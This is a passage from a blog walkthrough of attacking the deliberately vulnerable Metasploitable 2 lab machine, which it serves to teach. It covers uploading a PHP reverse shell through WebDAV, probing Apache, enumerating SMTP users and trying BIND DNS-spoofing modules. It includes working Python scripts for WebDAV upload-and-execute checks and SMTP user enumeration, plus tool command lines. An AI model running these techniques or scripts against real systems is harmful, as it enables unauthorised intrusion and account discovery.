can use it to get a remote shell.<h4>Creating a payload with MSFVenom</h4><p>The <b><em>msfvenom</em></b> utility can be used to generate a reverse TCP shell in a PHP script. Basically, here's what you specify with msfvenom:<ul><li>LHOST - This is the machine that you want your target machine to try and connect to. This must be the publicly-visible (or at least visible to the target) IP of your attacker machine.</li><li>LPORT - this is the port number that you want the target machine to connect to. 
The attacker machine must be listening on this port, and the target must be able to reach it (no firewall or NAT in the way).</li></ul><p>In this case, 172.16.1.6 is the IP of the attacker machine and 4444 the listener port on the attacker.<p><a href="https://drive.google.com/uc?id=1MGhtlGX-61X6Ltl5mjzoiZu9RPDTWGV4" target="_blank"><img width="828" height="116" title="Creating the msfvenom payload" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Creating the msfvenom payload" src="https://drive.google.com/uc?id=1HT1HwGWorLyJq0YQ0Z27kuKhpvIHdYYK" border="0"></a><p>Now use cadaver to connect and put the PHP shell onto the web server:<p><a href="https://drive.google.com/uc?id=1fHw3yETcy5c5yFYtwZWY4WVEtfmSmeDD" target="_blank"><img width="824" height="147" title="Uploading the payload" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Uploading the payload" src="https://drive.google.com/uc?id=1IqS5Nqk1IARhU67iDA1YYwup-OQ5kr07" border="0"></a><p>Now start a Metasploit listener with <b><em>exploit/multi/handler</em></b>, setting the same payload, LHOST and LPORT you gave msfvenom:<p><a href="https://drive.google.com/uc?id=1fzbBZYOyDaQWDUzu_LaWQW401cuESSs9" target="_blank"><img width="834" height="217" title="Starting a Metasploit listener " style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Starting a Metasploit listener " src="https://drive.google.com/uc?id=1fbZlpvaiKUZYV6dE4FfuyZVw-TjKJFeq" border="0"></a><p>This will wait for the reverse connection from the target machine.<p>The final step is to execute the PHP file. Click the PHP file or visit its URL in the browser. 
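<p>The WebDAV checks that davtest runs, and the upload-then-fetch cycle you have just done by hand with cadaver and the browser, as an added Python example (not part of the original post): probe_webdav() issues OPTIONS, PUT and GET over raw HTTP and reports whether an uploaded .php file is executed or merely served back. The in-process WebDAV server it talks to is a stand-in constructed for the demo; point the function at http://[Target IP]/dav/ for the real thing.</p>

```python
"""davtest and cadaver reduced to raw HTTP: OPTIONS for the DAV/Allow headers,
PUT a file, GET it back and see whether the server served it or executed it.

Added example, not code from the post. probe_webdav() works against any
WebDAV URL (point it at http://<target>/dav/ for the real thing); the
in-process server below is a stand-in constructed for the demo that accepts
PUT and mimics mod_php on .php files, which is how Metasploitable's /dav
behaves and why an uploaded web shell runs.
"""
import http.client
import re
import threading
import uuid
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.parse import urlsplit


def probe_webdav(base_url: str, timeout: float = 5.0) -> dict:
    """Return {"dav": ..., "allow": ..., "put": {ext: status}, "executed": {ext: bool}}."""
    u = urlsplit(base_url)
    path = u.path if u.path.endswith("/") else u.path + "/"
    conn = http.client.HTTPConnection(u.hostname, u.port or 80, timeout=timeout)
    conn.request("OPTIONS", path)
    resp = conn.getresponse()
    resp.read()
    report = {"dav": resp.getheader("DAV"), "allow": resp.getheader("Allow"),
              "put": {}, "executed": {}}
    tag = uuid.uuid4().hex[:8]                       # unique name, as davtest does
    samples = {"txt": f"davtest-{tag}",
               "php": f"<?php echo 'davtest-{tag}'; ?>"}
    for ext, body in samples.items():
        name = f"{path}davtest_{tag}.{ext}"
        conn.request("PUT", name, body=body.encode(),
                     headers={"Content-Type": "application/octet-stream"})
        resp = conn.getresponse()
        resp.read()
        report["put"][ext] = resp.status
        if resp.status not in (200, 201, 204):
            continue
        conn.request("GET", name)
        resp = conn.getresponse()
        fetched = resp.read().decode(errors="replace")
        # Executed = our marker came back without the PHP tags that produced it.
        report["executed"][ext] = (ext == "php" and "<?php" not in fetched
                                   and f"davtest-{tag}" in fetched)
    conn.close()
    return report


class _FakeDav(BaseHTTPRequestHandler):
    """Accepts PUT into memory; serves .php through a toy 'interpreter' that only
    understands echo '...'; everything else is served verbatim."""
    store = {}

    def log_message(self, *args):        # keep the demo quiet
        pass

    def _reply(self, status, body=b"", extra=()):
        self.send_response(status)
        for key, value in extra:
            self.send_header(key, value)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_OPTIONS(self):
        self._reply(200, extra=[("DAV", "1,2"),
                                ("Allow", "OPTIONS,GET,HEAD,POST,PUT,DELETE,PROPFIND,MKCOL")])

    def do_PUT(self):
        length = int(self.headers.get("Content-Length", 0))
        self.store[self.path] = self.rfile.read(length)
        self._reply(201)

    def do_GET(self):
        data = self.store.get(self.path)
        if data is None:
            self._reply(404)
            return
        if self.path.endswith(".php"):
            match = re.search(rb"echo '([^']*)'", data)
            data = match.group(1) if match else b""
        self._reply(200, data)


def start_fake_dav() -> str:
    """Start the stand-in on an ephemeral port; returns its /dav/ base URL."""
    srv = ThreadingHTTPServer(("127.0.0.1", 0), _FakeDav)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return f"http://127.0.0.1:{srv.server_address[1]}/dav/"


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else start_fake_dav()
    print(probe_webdav(target))
```

Against a real server the interesting outcome is exactly the one the mock produces: PUT accepted and the .php file coming back without its tags means uploaded PHP is executed, which is the precondition for every web shell and reverse shell in this section.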
<p><a href="https://drive.google.com/uc?id=1Vl_wK-i57TJW1Ie0u8C8UsVoTYA8_ZbP" target="_blank"><img width="825" height="129" title="Executing the msfvenom payload" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Executing the msfvenom payload" src="https://drive.google.com/uc?id=1XlQKFvmp3BbUuvhGeZlcXVMRSxGigH5L" border="0"></a><p>This will execute the PHP code, create a shell, and open a connection back to your Metasploit console.<p><a href="https://drive.google.com/uc?id=14LXXqKkQSlw6016fky3XZjQbwKKe94mI" target="_blank"><img width="821" height="133" title="Meterpreter reverse shell" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Meterpreter reverse shell" src="https://drive.google.com/uc?id=1fuYf7B9tonFG0ZC44_dxnRN1TVkc_VU5" border="0"></a><h2>Exploiting Port 80 - Apache Server</h2><p>This section covers techniques for exploiting the Metasploitable Apache server (Apache 2.2.8). It starts with some general techniques (working for most web servers), then moves to the Apache-specific ones.<p>This will also ignore the Tomcat server - we'll get to that later.</p><h3>Exploiting Apache Server using Metasploit</h3><p>Let’s try some MSF modules:<p>The <strong><em>auxiliary/scanner/http/files_dir</em></strong> module checks for the presence of interesting files on the web server. 
By default, it uses a dictionary list that comes with Metasploit (<b><em>/usr/share/metasploit-framework/data/wmap/wmap_files.txt</em></b>) but you can also use your own.<h4><a href="https://drive.google.com/uc?id=1lBMP1Z93huu0CsNansewH6si2hK3GNfF" target="_blank"><img width="769" height="924" title="Using MSF to scan the Apache server" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Using MSF to scan the Apache server" src="https://drive.google.com/uc?id=1UbjnXi0clrOkdmqU9HyhdgchlNsky3xI" border="0"></a></h4><p>Some directories return the HTTP code 301 (Moved Permanently). That is Apache's answer to a request for an existing directory without the trailing slash, so a 301 is a confirmation that the directory is there.<h4>Telnet to explore the 301s</h4><p>If you use telnet to connect to port 80 and send a GET request for a resource that returns a 301, you can see more information:<p>Connect to port 80, type a GET request line with the path you want, add a <b><em>Host:</em></b> header, then press Enter twice: the empty line terminates the request, and the server answers with the 301 and a <b><em>Location</em></b> header pointing at the real resource:<p><a href="https://drive.google.com/uc?id=17B_C4F7xKC_v3sK8d54vyw66Iu1aVRxN" target="_blank"><img width="436" height="221" title="Telnet to port 80" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Telnet to port 80" src="https://drive.google.com/uc?id=1O-Ra2ZytSa07Nj-G9mmIakTRUbf_VZQN" border="0"></a><p>Following that Location in a browser gives you a phpMyAdmin page that looks like it has lots of information that could be fuzzed. 
However, fuzzing the phpMyAdmin login page (and attacking vulnerabilities in phpMyAdmin itself) will launch you into a whole new set of tools and concepts, so we'll leave that for some other time.<p><a href="https://drive.google.com/uc?id=1e0nZKUMGzSc_3tyIdCASjO3ztQij_GEE" target="_blank"><img width="778" height="515" title="phpMyAdmin page " style="margin: 0px auto; float: none; display: block; background-image: none;" alt="phpMyAdmin page " src="https://drive.google.com/uc?id=18iFBX02peOsqL7UX4CySN1fqPyM1V2sT" border="0"></a><p>Try some other MSF modules:<p><a href="https://drive.google.com/uc?id=10RXwPMksc2sc9WftzP9OKzkWQ_lBw-Bi" target="_blank"><img width="771" height="167" title="Failed MSF module" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Failed MSF module" src="https://drive.google.com/uc?id=1L4DyShrI2pa1pauBMR2OBHfVbC8_tFCo" border="0"></a><p>Funny, it doesn’t even show the previously found directories<p>This next one will find some additional directories<p><a href="https://drive.google.com/uc?id=1aTypHYIGI116UkaBbHszsThlRvKb3Vau" target="_blank"><img width="773" height="354" title="Using MSF to scan the Apache server" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Using MSF to scan the Apache server" src="https://drive.google.com/uc?id=1kyCQXaR-41sQct7zEavm4FIZh4AFjB0I" border="0"></a><p>There are many Apache-specific modules and that makes it difficult to figure out where to begin. 
Take a look at Legion/Nikto scan results and you’ll see the following vulnerability:</p><p><a href="https://drive.google.com/uc?id=16sa4mZGcrq_chRCPrOCia2uM7s7VenjS" target="_blank"><img width="816" height="120" title="Selecting an Apache server specific vulnerability" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Selecting an Apache server specific vulnerability" src="https://drive.google.com/uc?id=1oD49NEatmIGOZlR6O_qE-il8sF2soAsi" border="0"></a><p>Load the Metasploit module to scan for this vulnerability:<p><a href="https://drive.google.com/uc?id=1cxtNFsVZCaACECzJQq9ToFrcZG_IOidO" target="_blank"><img width="806" height="169" title="Using MSF to scan for the vulnerability" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Using MSF to scan for the vulnerability" src="https://drive.google.com/uc?id=12k-AptqLecejvksZzXG4gSDSvJL4xWp9" border="0"></a><p>Running it confirms that the Apache web server is vulnerable (IP addresses of vulnerable web servers are printed out).<p>Now load the other auxiliary module to try to take advantage of the vulnerability:<p><a href="https://drive.google.com/uc?id=1Hm-U3YYDwjmGHdfmWl8Fx2QsmrkBnkzV" target="_blank"><img width="802" height="170" title="Trying to exploit the vulnerability with MSF" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Trying to exploit the vulnerability with MSF" src="https://drive.google.com/uc?id=1tGAdI6FnXxcW4eva2mCo-_naccWFHUWe" border="0"></a><p>In this case, nothing happens confirming what you have found before; the <b><em>index.php</em></b> is the only file available on this Apache server.Rui Natáriohttp://www.blogger.com/profile/12067366039242874604noreply@blogger.com0tag:blogger.com,1999:blog-6396309617370994433.post-11647142275459544862020-11-03T14:04:00.000-08:002020-11-21T00:09:16.998-08:00Metasploitable 2 Walkthrough: Part III<h2>Exploiting Port 25 – SMTP</h2><p>SMTP stands for Simple Mail 
Transfer Protocol. It moves mail between servers, and a server has to know which local users it accepts mail for; several SMTP commands let a client ask about them, which is what the enumeration below exploits.<h3>Exploiting SMTP using Metasploit</h3><p>Your first task is to determine which software and version is running behind port 25. Metasploit has an auxiliary module for that, <b><em>auxiliary/scanner/smtp/smtp_version</em></b>, so try it:<p><a href="https://drive.google.com/uc?id=1h9SUWm39ePpZZBpiG3hZ1ckBJ8DoTxqI" target="_blank"><img width="828" height="126" title="Enumerating SMTP with MSF" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating SMTP with MSF" src="https://drive.google.com/uc?id=1cjojBDORlVJJixj72g8piXgTD1bOrobW" border="0"></a><p>Now you can search in Google, ExploitDB, etc.<p>You can also try to enumerate the service's users with <b><em>auxiliary/scanner/smtp/smtp_enum</em></b>, which tries <b><em>VRFY</em></b> (falling back to <b><em>EXPN</em></b> and <b><em>RCPT TO</em></b>) for every name in a wordlist and keeps the ones the server confirms.<p><a href="https://drive.google.com/uc?id=10o7Ac7auuaP4xAI8Vbn5KJGMfRUdWem1" target="_blank"><img width="832" height="173" title="Enumerating SMTP users with MSF" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating SMTP users with MSF" src="https://drive.google.com/uc?id=1-9RdNCDemrEZIDUDfJcgLKiKJI2qCqeD" border="0"></a><p>The module was able to extract a list of valid users from the SMTP service.<a name="more"></a><h3>Exploiting SMTP using other tools</h3><p>SMTP has a set of <a href="http://www.tcpipguide.com/free/t_SMTPCommands-2.htm">commands</a> that can be used for several tasks. You can connect to your target on port 25 using Netcat and then query its user database by hand with <b><em>VRFY</em></b> (or <b><em>EXPN</em></b> for aliases, or a <b><em>RCPT TO</em></b> probe when VRFY is disabled).<p>Or, instead of verifying users one by one, you can try to use other tools. 
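<p>What those tools do under the hood, as an added Python example (not part of the original post): VRFY each candidate name, interpret the reply code, and fall back to a MAIL FROM / RCPT TO probe when the server has VRFY disabled. The mock SMTP server and its user list are constructed for the demo; give enumerate_users() a real host on port 25 for the real thing.</p>

```python
"""SMTP user enumeration with VRFY, falling back to RCPT TO, which is what
smtp-user-enum and MSF's smtp_enum automate.

Added example, not code from the post. enumerate_users() drives the protocol
with smtplib's docmd() and classifies reply codes: 250 = user exists,
252 = "cannot verify, will try delivery" (ambiguous), 550/551/553 = no such
user, 500/502 = verb disabled, in which case it retries with MAIL FROM /
RCPT TO, which a mail server can hardly refuse to answer. The mock SMTP
server is constructed for the demo (user list included); aim the function at
a real host on port 25 for the real thing.
"""
import smtplib
import socket
import threading

KNOWN_USERS = {"root", "msfadmin", "postfix", "www-data"}   # constructed sample


def classify(code: int) -> str:
    if code == 250:
        return "yes"
    if code == 252:
        return "maybe"          # will not verify, will accept delivery: says nothing
    if code in (550, 551, 553):
        return "no"
    if code in (500, 502):
        return "unsupported"    # verb disabled; try the next method
    return "unknown"


def enumerate_users(host, users, port=25, methods=("VRFY", "RCPT"),
                    helo="kali", timeout=5.0):
    """Return {username: verdict}; a method the server rejects is skipped for that user."""
    results = {}
    smtp = smtplib.SMTP(host, port, local_hostname=helo, timeout=timeout)
    try:
        smtp.ehlo_or_helo_if_needed()
        for user in users:
            verdict = "unsupported"
            for method in methods:
                if method == "VRFY":
                    code, _ = smtp.docmd("VRFY", user)
                else:
                    smtp.docmd("MAIL FROM:", "<probe@example.invalid>")
                    code, _ = smtp.docmd("RCPT TO:", f"<{user}>")
                    smtp.docmd("RSET")          # abandon the transaction, keep the session
                verdict = classify(code)
                if verdict != "unsupported":
                    break
            results[user] = verdict
    finally:
        smtp.quit()
    return results


class MockSmtpd:
    """Tiny SMTP server on 127.0.0.1:<ephemeral>; allow_vrfy=False makes it behave
    like a hardened MTA that answers VRFY with 502 but still leaks via RCPT TO."""

    def __init__(self, allow_vrfy=True):
        self.allow_vrfy = allow_vrfy
        self.srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.srv.bind(("127.0.0.1", 0))
        self.srv.listen(5)
        self.port = self.srv.getsockname()[1]
        threading.Thread(target=self._accept, daemon=True).start()

    def _accept(self):
        while True:
            conn, _ = self.srv.accept()
            threading.Thread(target=self._session, args=(conn,), daemon=True).start()

    def _session(self, conn):
        rfile = conn.makefile("rb")
        conn.sendall(b"220 metasploitable.localdomain ESMTP mock\r\n")
        while True:
            line = rfile.readline()
            if not line:
                break
            verb, _, arg = line.decode(errors="replace").strip().partition(" ")
            verb = verb.upper()
            if verb in ("EHLO", "HELO"):
                reply = "250 metasploitable.localdomain"
            elif verb == "VRFY":
                if not self.allow_vrfy:
                    reply = "502 5.5.1 VRFY command is disabled"
                elif arg in KNOWN_USERS:
                    reply = f"250 2.1.5 <{arg}@localdomain>"
                else:
                    reply = f"550 5.1.1 <{arg}>: Recipient address rejected: User unknown"
            elif verb == "MAIL":
                reply = "250 2.1.0 Ok"
            elif verb == "RCPT":
                name = arg.split(":", 1)[-1].strip().strip("<>").split("@")[0]
                reply = "250 2.1.5 Ok" if name in KNOWN_USERS else "550 5.1.1 User unknown"
            elif verb in ("RSET", "NOOP"):
                reply = "250 2.0.0 Ok"
            elif verb == "QUIT":
                conn.sendall(b"221 2.0.0 Bye\r\n")
                break
            else:
                reply = "500 5.5.2 Error: command not recognized"
            conn.sendall(reply.encode() + b"\r\n")
        conn.close()


if __name__ == "__main__":
    import sys
    print(enumerate_users(sys.argv[1], ["root", "msfadmin", "nobody", "bogus"]))
```

The fallback matters on real targets: disabling VRFY is the usual hardening, but as long as the server distinguishes a known recipient from an unknown one at RCPT TO time, the list leaks anyway; only a uniform reply (or a 252 for everyone) closes the channel.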
<p><em><strong>smtp-user-enum -M VRFY -U user.txt -t [Target IP]</strong></em><p>or<p><strong><em>smtp-user-enum -M VRFY -u root -t [Target IP]</em></strong><p>And you can also use Nmap to enumerate the target but the script appears to have problems.<p><strong><em>nmap --script smtp-enum-users -p 25 [Target IP]</em></strong><p><a href="https://drive.google.com/uc?id=1cZXj0q3g0EJJhimdw9g1BEwL8fAsiTW5" target="_blank"><img width="845" height="285" title="Enumerating SMTP users with Nmap" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Enumerating SMTP users with Nmap" src="https://drive.google.com/uc?id=1EEZ1rANTj7Wz0W5fi80VyHvZ0b3hqb0t" border="0"></a><p>As a side note, keep in mind the existence of enum4linux:<p><strong><em>enum4linux -U [Target IP]</em></strong><p>However, these options rely on old scripts/apps created in now obsolete versions of Perl or Python so don’t be surprised if they don’t always produce the best results when used inside the current Kali version (2020.3)<h2>Exploiting Port 53 – BIND</h2><p>The Berkeley Internet Name Domain (BIND) is an implementation of the Domain Name System (DNS) of the Internet. It performs both of the main DNS server roles, acting as an authoritative name server for domains, and acting as a recursive resolver in the network. As of 2015, it is the most widely used domain name server software and is the de facto standard on Unix-like operating systems.<p>Searching for exploits for ISC BIND 9.4.2, you will find the following exploit:<p><b><em>https://www.exploit-db.com/exploits/6122/</em></b><p>This exploit is labeled <i><strong>auxiliary/spoof/dns/bailiwicked_domain</strong></i> in Metasploit and it will allow you to insert malicious DNS records into the DNS server.<h3>Exploiting DNS: bailiwicked domain</h3><p>This attack allows you to add your own DNS entries to a target DNS nameserver. 
Thus, you could create a DNS entry like somethingveryevil.microsoft.com that would direct visitors wherever you wish.<p>After setting the options for the module, it should be possible to test it, but it fails:<p><a href="https://drive.google.com/uc?id=1i1F_9l5ZcsCS2siWOb72zOs1aweyoh16" target="_blank"><img width="824" height="262" title="Failed MSF module" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Failed MSF module" src="https://drive.google.com/uc?id=1rssvBN8gqmqIZYYEw3R15a-e6r47leao" border="0"></a><p>And the exploit itself also fails.<h3>Exploiting DNS: bailiwicked host</h3><p>This attack allows you to add your own host entry to a DNS nameserver's list of hostnames. This is done by confusing the nameserver by sending responses to fake DNS queries.<p><a href="https://drive.google.com/uc?id=1IJpL9AuvwMqcdNUOx1mF0r60yGRzqgl2" target="_blank"><img width="825" height="290" title="Failed MSF module" style="margin: 0px auto; float: none; display: block; background-image: none;" alt="Failed MSF module" src="https://drive.google.com/uc?id=1jJ0wlaZvhPBhPYGGUAQLKC_U6RdBZN-K" border="0"></a><p>Similar exploit, similar results.Rui Natáriohttp://www.blogger.com/profile/12067366039242874604noreply@blogger.com0
